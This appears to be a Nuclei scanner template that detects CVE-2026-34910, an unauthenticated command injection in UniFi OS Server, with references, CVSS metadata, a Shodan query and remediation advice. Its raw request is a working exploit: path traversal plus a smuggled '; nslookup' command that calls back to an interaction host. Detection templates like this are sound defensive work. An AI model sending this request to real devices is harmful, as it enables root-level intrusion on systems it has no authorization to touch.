Description
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
id: CVE-2026-34910
info:
name: UniFi OS Server - Command Injection
author: Kazgangap
severity: critical
description: |
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
impact: |
Network attackers can execute arbitrary commands, potentially leading to full system compromise.
remediation: |
Update to the latest version of UniFi OS.
reference:
- https://bishopfox.com/blog/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysis
- https://nvd.nist.gov/vuln/detail/CVE-2026-34910
- https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b
- https://www.it-connect.tech/critical-3-exploit-chain-grants-root-access-on-unifi-os-server/
classification:
cve-id: CVE-2026-34910
epss-score: 0.87468
epss-percentile: 0.99748
cvss-score: 10.0
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
metadata:
verified: true
max-request: 1
shodan-query: html:"UniFi OS"
tags: cve,cve2026,unifi,rce,vkev,kev
http:
- raw:
- |
GET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+{{interactsh-url}}+%3b HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains_any(body , "CODE_SYSTEM_ERROR", "System failure")'
- 'contains(interactsh_protocol, "dns")'
- 'status_code == 200'
condition: and
# digest: 4b0a004830460221008cff5a8d732bbdc5b7c105bfeb802761b46379336e803b198534037a3e0b5242022100aa2e4e76028b6f6c30726c56accfe48d5f22653770941093f3524a83922a0a2e:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.